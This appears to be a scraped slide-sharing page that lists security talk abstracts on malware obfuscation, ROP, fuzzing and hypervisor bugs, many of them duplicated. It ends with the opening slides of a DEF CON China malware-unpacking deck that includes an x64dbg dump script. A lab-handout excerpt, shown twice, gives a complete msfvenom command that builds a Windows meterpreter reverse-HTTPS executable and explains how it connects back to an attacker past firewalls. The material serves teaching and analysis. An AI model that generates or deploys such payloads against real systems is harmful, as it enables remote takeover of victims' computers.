Modern advanced malware samples are used to infect countries and are part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write this malicious code, try to make static and dynamic analysis really hard by heavily obfuscating and eventually virtualizing their code, using techniques such as CFG, call stack manipulation, dead code, opaque predicates and so on. Understanding these concepts and how they are used by virtualized packers is an advantage when learning the main anti-reversing techniques.
Therefore, to manage complex scenarios such as those described above, we can use frameworks such as METASM and MIASM and several dynamic and static emulation techniques to simplify the code. In the end, the goal is to reduce the code (most of the time by using symbolic analysis), giving us a better understanding of the threat. Additionally, the introduction of dynamic tracing (DTrace) on Windows can help us gain a better understanding of programs and their behavior.
This presentation aims to show concepts and a practical approach on how to handle these reverse engineering challenges and techniques.
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a service that restarts after a crash. The attack works against modern 64-bit Linux with address space layout randomization (ASLR), no-execute page protection (NX) and stack canaries.
Hardware hacking hit the news quite often in 2017, and a lot of pentesters tried to jump onto the bandwagon and discover the joy of hacking things rather than servers or applications. But most of them are only looking for rootz shellz and p0wning embedded Linux operating systems rather than doing what we really call "hardware hacking". In this talk, we are going to hack a Bluetooth Low Energy smartlock, from its printed circuit board to a fully working exploit, as well as its (wait for it) associated mobile application you need to install to operate this thing.
This talk is not only an introduction into the field of hardware hacking, but also a good way to dive into electronics and its specific protocols, and of course into microcontroller and System-on-Chip reverse engineering. We will cover some basic electronics knowledge as well as tools and classic methodologies when it comes to analyzing an IoT device, and will provide tips and tricks based on our experience and our failures too.
Monitoring a program that monitors computer networks - PVS-Studio
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Class on basic vulnerabilities given at UFPR in 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
Finding Resource Manipulation Bugs in Linux Code - Andrzej Wasowski
Software projects suffer from conceptually simple resource manipulation bugs, such as accessing a de-allocated memory region, or acquiring a non-reentrant lock twice. The VBDB bug database contains entries for 100 such real bugs from several open source projects, including the Linux Kernel project. These historical bugs have been collected with the aim of giving concrete, well-understood and documented cases to program analysis researchers, in order to boost program verification research. I will discuss the simplicity and complexity of real software manipulation bugs on examples selected from VBDB. One way to reduce the number of such bugs is to use code scanners such as Smatch or Coccinelle. Unfortunately, while very efficient, code scanners are typically based on syntactic pattern matching, which is insufficient for identifying problems that span multiple functions and involve dynamically allocated memory. We have developed a shape-and-effect inference system for C that constructs a lightweight semantic abstraction, more analyzable than syntax. A model checker is then used to match semantic bug patterns over the control flow graph decorated with the shape-and-effect abstractions. Experiments run with our prototype analyzer (EBA) show better precision and effectiveness than with syntactic bug scanners. We have so far been able to identify 10 previously unknown locking bugs in the Linux kernel. The bugs are confirmed as real by the Kernel developers, and five of them have already been fixed in response to our reports. I will conclude by sketching how we combine EBA with another tool, RECONFIGURATOR, to massively scan Linux kernel code for bugs in atypical source configurations.
Having developed a test set, we started to research how safe it is for clients to use the 4G networks of the telecommunication companies. During the research we tested SIM cards, 4G USB modems, radio components and the IP access network. First of all we looked for vulnerabilities that could be exploited remotely, via the IP or radio network.
And the results were not long in arriving. In some cases we managed to attack SIM cards and install a malicious Java applet there; we were able to remotely update USB modem firmware, to change the password on a self-care portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped us understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install a bootkit on the box that this modem is connected to.
Zero bugs found? Hold my beer AFL! How to improve coverage-guided fuzzing and... - Maksim Shudrak
Fuzzing remains the most effective technique for bug hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing were published, and dozens of them focused on adapting or improving American Fuzzy Lop in some way. Attractive for its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful, since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in the Google OSS-Fuzz program, which utilizes AFL to generate half a trillion test cases per day.
In practice, this means that we cannot blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk aims to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a highly scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues that exist in AFL. The authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be of interest to experienced hackers who are willing to improve their bug hunting capabilities, as well as to new researchers who are making their first steps on the thorny trail of bug hunting.
"Instead of simply emulating old and slow hardware, modern hypervisors use paravirtualized devices to provide guests access to virtual hardware. Bugs in the privileged backend components can allow an attacker to break out of a guest, making them quite an interesting target.
In this talk, I'll present the results of my research on the security of these backend components and discuss Xenpwn, a hypervisor-based memory access tracing tool used to discover multiple critical vulnerabilities in paravirtualized drivers of the Xen hypervisor."
(Source: Black Hat USA 2016, Las Vegas)
Monitoring a program that monitors computer networks - Andrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat... - RootedCON
Return-Oriented Programming (ROP) attacks allow an attacker to hijack the control-flow execution of a vulnerable process using instructions already present in its memory map. Thus, the attacker concatenates sequences of instructions (named ROP gadgets), redirecting the control-flow execution to perform whatever computation he/she wants. Those instruction sequences, when executed, perform a well-defined operation, such as an XOR or an addition between two registers.
A Turing machine is an abstract concept that defines a theoretical model able to solve any computational problem using a set of minimal operations. A system is said to be Turing-complete if it simulates a Turing machine, that is, if it is able to perform the same set of minimal operations. In particular, these operations are: to load a constant, to move values, to load and to store a value from/to memory, and to perform arithmetic and logic operations.
In this talk, we introduce a tool named EasyROP, which seeks the gadgets in a given binary file that are semantically equivalent to each of those operations. Hence, EasyROP helps to automate the development of ROP attacks. We analyzed the main dynamic-link libraries of most flavours of the Windows OS, in 32 and 64-bit modes, to study the feasibility of an attack on these systems. We found that shell32.dll is the best candidate in 32-bit systems. In the case of 64-bit systems, no DLL allows one to build a Turing machine. We also show the applicability with a real case study, showing how to build a ROP chain attack for CVE-2010-3333 on a Windows 7 32-bit system.
I know I promised not to touch upon the topic of 3DO console emulators anymore - well, sorry for breaking that promise. You see, I've recently had an opportunity to try such an exotic thing as a static code analyzer - PVS-Studio, to be exact. The first project I decided to try it on was, naturally, my 3DO console emulator (Phoenix Project). It was the first 32-bit console with a CD drive, dating back to the beginning of the 90s. Dad bought it in Moscow as a present for me and my brother - and I've been fond of it since then :-). And since I've got such an opportunity, why not check all the other 3DO emulators too? Here we go...
Modern advanced malware samples are used to infect countries and are part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write this malicious code, try to make static and dynamic analysis really hard by heavily virtualizing and obfuscating their code using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicates and so on. Therefore, to manage complex scenarios such as those described above, we can use tools such as METASM, MIASM and several emulation techniques to simplify the code. In the end, the goal is to reduce the code (most of the time by using symbolic analysis), giving us a better understanding of the threat. This presentation aims to show concepts and a practical approach on how to handle these reverse engineering problems.
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE -- HITB 2019 AMSTERDAM - Alexandre Borges
Modern advanced malware samples are used to infect countries and are part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write this malicious code, try to make static and dynamic analysis really hard by heavily virtualizing and obfuscating their code using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicates and so on.
To manage the complex scenarios described above, we can use tools such as METASM, MIASM and several emulation techniques to make the code simpler. The goal is to reduce the code (most of the time by using symbolic analysis), in order to allow us a better understanding of the threat. This presentation aims to show concepts and a practical approach on how to handle obfuscation reverse engineering challenges and threats involving BIOS/UEFI malware.
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY) - Alexandre Borges
Malware threats have been impacting the way that companies make and protect their business. In general, most companies have bought several different products to compose their infrastructure and defense line, but these are only efficient against known and simple threats. Curiously, most infections start through a simple vector such as a malicious document or simple phishing. However, the problem is another one: what kind of malware can a simple dropper download onto the system? Most ring 3 threats are visible, but some of them are not. Additionally, ring 0 threats are usually very dangerous because they work under the radar, deeply compromising the system and bypassing protections. Worse, they can make the monitoring tools useless and open the way to advanced threats like BIOS/UEFI malware. What kind of techniques are used by these threats? What protections do we have? This presentation aims to show and explain some techniques used by advanced malware threats and the protections against them.
.NET MALWARE THREAT: INTERNALS AND REVERSING - DEF CON USA 2019 - Alexandre Borges
.NET malware is well known to security analysts, but even though many tools such as dnSpy, .NET Reflector, de4dot and so on exist to make the analysis easier, most professionals have used them as black-box tools, without concern for .NET internals, structures, MSIL coding and details. In critical cases, it is necessary to have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg.
Unfortunately, .NET malware samples have become very challenging because it is so complicated to deobfuscate their associated resources, as well as to unpack and dump them from memory. Furthermore, most GUI debugging tools do not provide an inside view of mechanisms such as the CLR Loader, the Managed Heap, synchronization issues and Garbage Collection.
On the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows one to see code injections using MSIL, and attempts to compromise the .NET Runtime remain a real concern.
The purpose of this presentation is to help professionals understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and a few reversing techniques.
Automotive Cybersecurity: Test Like a Hacker - ForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx - pauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.
Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore strategies to evade antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in the terminal window and press Enter.
You can copy this command and paste it into the terminal window of the Kali VM.
4) After running this command, a file named ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables, shellcode and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings: https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and on LANs (Local Area Networks). It is the default port for TLS traffic (mostly encrypted web traffic).
msfvenom uses the reverse_https payload to create a malicious file. Once initiated by the victim, the malicious file will make a reverse HTTPS connection between the victim's and the attacker's computers.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
Finding Resource Manipulation Bugs in Linux CodeAndrzej Wasowski
Software projects suffer from conceptually simple resource manipulation bugs, such as accessing a de-allocated memory region, or acquiring a non-reentrant lock twice. The VBDB bug database contains entries for 100 such real bugs from several open source projects, including the Linux Kernel project. These historical bugs have been collected with the aim of giving concrete well understood and documented cases to program analysis researchers, in order to boost program verification research. I will discuss simplicity and complexity of real software manipulation bugs on examples selected from VBDB. One way to reduce the amount of such bugs is to use code scanners such as Smatch or Coccinelle. Unfortunately, while very efficient, code scanners are typically based on syntactic pattern matching, which is insufficient for identifying problems that span multiple functions and involve dynamically allocated memory. We have developed a shape-and-effect inference system for C that constructs a lightweight semantic abstraction, more analyzable than syntax. A model checker is then used to match semantic bug patterns over the control flow graph decorated with the shape-and-effect abstractions. Experiments run with our prototype analyzer (EBA) shows better precision and effectiveness than with syntactic bug scanners. We have been so far able to identify 10 previously unknown locking bugs in the Linux kernel. The bugs are confirmed as real by the Kernel developers, and five of them have been already fixed in response to our reports. I will conclude, sketching how we combine EBA with another tool, RECONFIGURATOR, to massively scan Linux kernel code for bugs in atypical source configurations.
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.
In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.
"Instead of simply emulating old and slow hardware, modern hypervisors use paravirtualized devices to provide guests access to virtual hardware. Bugs in the privileged backend components can allow an attacker to break out of a guest, making them quite an interesting target.
In this talk, I'll present the results of my research on the security of these backend components and discuss Xenpwn, a hypervisor based memory access tracing tool used to discover multiple critical vulnerabilities in paravirtualized drivers of the Xen hypervisor. "
(Source: Black Hat USA 2016, Las Vegas)
Monitoring a program that monitors computer networksAndrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
Return-Oriented Programming (ROP) attacks allow to hijack the control-flow execution of a vulnerable process using instructions already present in its memory map. Thus, the attacker concatenates sequences of instructions (named ROP gadgets) redirecting the control-flow execution to perform whatever computation he/she wants. Those instruction sequences, when executed, perform a well-defined operation, such as a XOR or an addition between two registers.
A Turing machine is an abstract concept to define a theoretical model able to solve any computational problem using a set of minimal operations. A system is said to be Turing-complete whether simulates a Turing machine, that is, if it is able to perform the same set of minimal operations. In particular, these operations are: to load a constant, to move values, to load and to store a value from/to memory, and to perform arithmetic and logic operations.
In this talk, we introduce a tool named EasyROP, which seeks the gadgets in a given binary file that are semantically equivalent to each of those operations. Hence, EasyROP helps to automate the development of ROP attacks. We analyzed the main dynamic-link libraries of most flavours of Windows OS, in 32 and 64-bit modes, to study the feasibility of an attack on these systems. We found that shell32.dll is the best candidate in 32-bit systems. In the case of 64-bit systems, none DLL allows to build a Turing machine. We also show the applicability with a real case study, showing how to build a ROP chain attack for CVE-2010-3333 in a Windows 7 32-bit system.
I know I promised not to touch upon the topic of 3DO console emulators anymore - well, sorry for breaking that promise. You see, I've recently had an opportunity to try such an exotic thing as a static code analyzer - PVS-Studio, to be exact. The first project I decided to try it on was, naturally, my 3DO console emulator (Phoenix Project). It was the first 32-bit console with a CD drive, dating back to the beginning of the 90-s. Dad bought it in Moscow as a present for me and my brother - and I've been fond of it since then :-). And since I've got such an opportunity, why not check all the other 3DO emulators too? Here we go...
Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious codes, try to make the static and dynamic analysis really hard by heavily virtualize and obfuscate codes using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on. Therefore, to manage complex sceneries as exposed above, we are able to use tools such as METASM, MIASM and several emulation techniques to make code simpler. At end, the goal is to reduce the code (most of time by using symbolic analysis), making us able to get a better understanding about the threat. This presentation aims to show concepts and a practical approach on how to handle these reverse engineering problems.
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE -- HITB 2019 AMSTERDAMAlexandre Borges
Modern advanced malware samples are used to infect countries and they are part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write this malicious code, try to make the static and dynamic analysis really hard by heavily virtualizing and obfuscating their code using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on.
To manage these complex scenarios, we are able to use tools such as METASM, MIASM and several emulation techniques to make the code simpler. The goal is to reduce the code (most of the time by using symbolic analysis), in order to allow us a better understanding of the threat. This presentation aims to show concepts and a practical approach on how to handle obfuscation reverse engineering challenges and threats involving BIOS/UEFI malware.
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY), by Alexandre Borges
Malware threats have been impacting the way that companies make and protect their business. In general, most companies have bought several different products to compose their infrastructure and defense line, but they are only efficient against known and simple threats. Curiously, most infections start through a simple vector such as a malicious document or simple phishing. However, the problem is another one: what kind of malware can a simple dropper download onto the system? Most ring 3 threats are visible, but some of them are not. Additionally, ring 0 threats are usually very dangerous because they work under the radar, compromising the system deeply and bypassing protections. Worse, they can make the monitoring tools useless and open the way to advanced threats like BIOS/UEFI malware. What kind of techniques are used by these threats? What protections do we have? This presentation aims to show and explain some techniques used by advanced malware threats and protections against them.
.NET MALWARE THREAT: INTERNALS AND REVERSING -- DEF CON USA 2019, by Alexandre Borges
.NET malware is well known by security analysts, but even though many tools such as dnSpy, .NET Reflector, de4dot and so on exist to make the analysis easier, most professionals have used them as black box tools, without paying attention to .NET internals, structures, MSIL coding and details. In critical cases, it is necessary to have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg.
Unfortunately, .NET malware samples have become very challenging because it is complicated to deobfuscate associated resources, as well as to unpack and dump them from memory. Furthermore, most GUI debugging tools do not give an inside view of mechanisms such as the CLR Loader, Managed Heap, synchronization issues and Garbage Collection.
On the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows us to see code injections using MSIL, and attempts to compromise the .NET Runtime keep being a real concern.
The purpose of this presentation is to help professionals understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and a few reversing techniques.
Automotive Cybersecurity: Test Like a Hacker, by ForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx, by pauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.
Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe
in the terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables, shellcode and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
msfvenom uses the reverse_https payload to create the malicious file. The malicious file will then make a reverse HTTPS connection between the victim's and the attacker's computers once started by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
The Golden Ticket: Docker and High Security Microservices, by Aaron Grattafiori, Docker, Inc.
True microservices are more than simply bolting a REST interface on your legacy application, packing it in a Docker container and hoping for the best. Security is a key component when designing and building out any new architecture, and it must be considered from top to bottom. Umpa Lumpas might not be considered "real" microservices, but Willy Wonka still has them locked down tight!
In this talk, Aaron will briefly touch on the idea and security benefits of microservices before diving into practical and real world examples of creating a secure microservices architecture. We'll start with designing and building high security Docker containers, using and examining the latest security features in Docker (such as User Namespaces and seccomp-bpf) as well as examining some typically forgotten security principles. Aaron will end on exploring related challenges and solutions in the areas of network security, secrets management and application hardening. Finally, while this talk is geared towards microservices, it should prove informational for all Docker users, building a PaaS or otherwise.
Slides for my lecture "Software security: vulnerabilities, exploits and possible countermeasures" that I had been giving for Samsung Electronics in Suwon, Korea (South).
ironSource's security application expert, Tomer Zait, shares his insights on engineering in the stack. Tomer, an Ort Singalovsky alumnus himself, gave this presentation to the Ort Singalovsky students on their tour of ironSource's headquarters in Tel Aviv.
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 securityxploded
This presentation is part of our Advanced Malware Analysis Training Series program.
For more details refer to our Security Training page:
http://securityxploded.com/security-training.php
Malware threats are the current and critical cyber security concern around the world. Every single day, many companies are struck by digital threats through malicious documents or phishing, having their systems infected and causing a huge loss of money. Indeed, ransomware represents a serious problem, but it is a visible threat. On the other side, rootkits and bootkits are really lethal because they infect and work under the radar, circumvent the usual defenses, take control of the system and, mainly, steal valuable information. The question is: how can we fight against an enemy that we can't see? This presentation aims to explain some details about malware attacks and protections.
0x01 - Newton's Third Law: Static vs. Dynamic Abusers, by OWASP Beja
If you offer a service on the web, odds are that someone will abuse it. Be it an API, a SaaS, a PaaS, or even a static website, someone somewhere will try to figure out a way to use it for their own needs. In this talk we'll compare measures that are effective against static attackers and how to battle a dynamic attacker who adapts to your countermeasures.
About the Speaker
===============
Diogo Sousa, Engineering Manager @ Canonical
An opinionated individual with an interest in cryptography and its intersection with secure software development.
MODERN MALWARE: OBFUSCATION AND EMULATION DEF CON CHINA 1.0 (2019)
1. DEF CON CHINA 1.0 (2019) 1
MODERN MALWARE:
OBFUSCATION AND EMULATION
DEF CON CHINA 1.0 (2019)
by Alexandre Borges
ALEXANDRE BORGES – MALWARE AND SECURITY RESEARCHER
2. DEF CON CHINA 1.0 (2019) 2
Malware and Security Researcher.
Speaker at DEFCON USA 2018
Speaker at HITB 2019 Amsterdam
Speaker at CONFidence Conf. 2019
Speaker at BSIDES 2018/2017/2016
Speaker at H2HC 2016/2015
Speaker at BHACK 2018
Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics and Rootkits.
Reviewer member of The Journal of Digital Forensics, Security and Law.
Referee on Digital Investigation: The International Journal of Digital Forensics & Incident Response
Agenda:
Introduction
Anti-reversing
METASM
MIASM
TRITON
Radare2 + MIASM
DTRACE on Windows
Anti-VM
Conclusion
4. DEF CON CHINA 1.0 (2019) 4
Every single day we handle malware samples that use several known packers such as
ASPack, Armadillo, Petite, FSG, UPX, MPRESS, NSPack, PECompact, WinUnpack and so on.
For most of them, it is easy to write scripts to unpack them.
We also know the main API functions used to create and allocate memory, such as:
VirtualAlloc/Ex( )
HeapCreate( ) / RtlCreateHeap( )
HeapReAlloc( )
GlobalAlloc( )
RtlAllocateHeap( )
Additionally, we know how to unpack them using debuggers, breakpoints and dumping the
unpacked content from memory. Furthermore, pe-sieve from Hasherezade is excellent.
When we realize that the malware uses some customized packing technique, it is still
possible to dump it from memory, fix the ImageAddress field with a few lines of Python and
rebuild its IAT with the impscan plugin, so that it can be analyzed in IDA Pro:
export VOLATILITY_PROFILE=Win7SP1x86
python vol.py -f memory.vmem procdump -p 2096 -D . --memory   (--memory keeps slack space)
python vol.py -f memory.vmem impscan --output=idc -p 2096
5. DEF CON CHINA 1.0 (2019) 5
//#############################################################
// FileName : dumpexe.txt (first draft)
// Comment : Dump memory segments containing executables
// Author : Alexandre Borges
// Date : today
//#############################################################
entry:
msg "Program to dump modules containing executables."
msg "You must be at EP before continuing"
bc // Clear existing breakpoints
bphwc // Clear existing hardware breakpoints
bp VirtualAlloc // Set up a breakpoint at VirtualAlloc
erun // run and pass all first exceptions to the application
core:
sti // Single-step
sti // Single-step
sti // Single-step
sti // Single-step
sti // Single-step
x64dbg script 1/3
6. DEF CON CHINA 1.0 (2019) 6
find cip,"C2 1000" // find the return point of VirtualAlloc (ret 0x10)
bp $result // set a breakpoint there
erun // run and pass all first exceptions to the application
cmp eax,0 // test whether eax (the allocated memory) is zero
je pcode // jump to the pcode label
bpm eax,0,x // set an execute memory breakpoint on the allocated region
erun // run and pass all first exceptions to the application
// try to find the "This program" string within the module's memory.
findall $breakpointexceptionaddress,"546869732070726F6772616D"
cmp $result,0 // check whether there isn't any hit
je pcode // jump to the pcode label
$dumpaddr = mem.base($breakpointexceptionaddress) // find the memory base.
$size = mem.size($breakpointexceptionaddress) // find the size of the memory region.
savedata :memdump:,$dumpaddr,$size // dump the segment.
msgyn "Memory dumped! Do you want to continue?" // show a dialog
cmp $result,1 // check your choice
je scode // jump to the scode label
bc // clear existing breakpoints
bphwc // clear existing hardware breakpoints
ret // exit
x64dbg script 2/3
7. DEF CON CHINA 1.0 (2019) 7
pcode:
msgyn "There isn't a PE file! Do you want to continue?"
cmp $result,0 // check whether we don't want to continue
je final
sti // single step.
erun // run and pass all first exceptions to the application
jmp core // jump to the core label
scode:
msg "Let's go to the next dump" // shows a message box
erun // run and pass all first exceptions to the application
jmp core // jump to the core label
final:
bc // clear existing breakpoints
bphwc // clear existing hardware breakpoints
ret // exit
x64dbg script 3/3
9. DEF CON CHINA 1.0 (2019) 9
Obfuscation aims to protect software from being reversed, to protect intellectual
property and, in our case, malicious code too. Honestly, obfuscation does not really
protect the program, but it can make the reverser's life harder than usual.
Thus, in the end, obfuscation buys time by forcing reversers to spend resources and
time to break the code.
We see obfuscated code every single day when we analyze common userland
malware, droppers written in VBA and PowerShell, so it might not seem to be a big
deal.
We can use the IDA Pro SDK to write plugins to extend the IDA Pro functionality,
analyze some code and data flow and even automate the unpacking of strange
malicious files.
Additionally, if you are facing problems analyzing a modified MBR, you could
